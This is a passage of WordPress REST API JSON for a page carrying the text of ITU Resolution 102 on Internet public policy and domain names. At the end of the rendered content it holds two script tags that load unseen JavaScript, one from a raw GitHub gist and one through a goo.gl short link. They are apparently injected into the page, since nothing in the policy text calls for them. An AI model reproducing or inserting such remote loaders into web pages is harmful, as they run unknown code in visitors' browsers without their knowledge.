src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>PP RESOLUTION 102 (Rev. Guadalajara, 2010) ITU&#8217;s role with regard to international public policy issues pertaining to the Internet and the management of Internet resources, including domain names and addresses The Plenipotentiary Conference of the International Telecommunication Union (Guadalajara, 2010), recognizing a) all relevant resolutions of the Plenipotentiary Conference; b) all relevant outcomes of the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1427,"menu_order":102,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-405","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/405","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=405"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/405\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1427"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=405"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}